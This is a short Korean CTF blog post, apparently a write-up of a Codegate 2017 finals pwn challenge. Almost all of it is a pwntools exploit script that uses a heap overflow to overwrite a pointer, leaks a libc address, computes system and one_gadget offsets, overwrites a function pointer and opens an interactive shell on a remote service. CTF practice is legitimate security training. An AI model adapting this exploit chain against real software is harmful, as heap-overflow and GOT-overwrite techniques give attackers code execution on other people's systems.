이번 코게 본선때 유일하게 풀었던 문제 입니다. ㅋㅋ
heapoverflow가 일어나는데 이안에있던 포인터를 덮어서 익스를 짰습니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 | # !/usr/bin/env python # powerprove from pwn import * host = "localhost" port = 4000 #s = remote("localhost", 4000) s = remote("200.200.200.105", 9899) raw_input() def menu(index): s.recvuntil("select") s.sendline(str(index)) def name(name): menu(6) s.recvuntil("name?") s.sendline(name) def set_pet(index, name, sound, feed): menu(4) s.recvuntil("set") s.sendline(str(index)) s.recvuntil("name") s.sendline(name) s.recvuntil("sound") s.sendline(sound) s.recvuntil("feed") s.sendline(feed) def buy(index): menu(1) s.recvuntil("select") s.sendline(str(index)) if __name__ == "__main__": buy(1) buy(2) name("AAAAAAAA") set_pet(2, "A", "B", "C"*12+p64(0x604040)+"\x08") menu(5) s.recvuntil("person") s.recvuntil("person:") libc_start_main = u64(s.recv(8)) libc_base = libc_start_main - 0x20740 system_addr = libc_base + 0x45390 one_shot = libc_base + 0xef6c4 log.info("libc_start_main : "+str(hex(libc_start_main))) log.info("libc_base : "+str(hex(libc_base))) log.info("system_addr : "+str(hex(system_addr))) set_pet(2, "A", "B", "C"*12+p64(0x604028)+"\x08") name(p64(one_shot)) s.interactive() | cs |
'CTF > 2017' 카테고리의 다른 글
| 허스트 CTF pwn write up (0) | 2017.05.31 |
|---|---|
| DEFCON_2017 beatmeonthedl (0) | 2017.05.07 |
| DEFCON - smashme (0) | 2017.05.07 |
| codegate 2017 - messenger write up (0) | 2017.04.05 |
| codegate 2017 - babypwn write up (0) | 2017.04.05 |
powerprove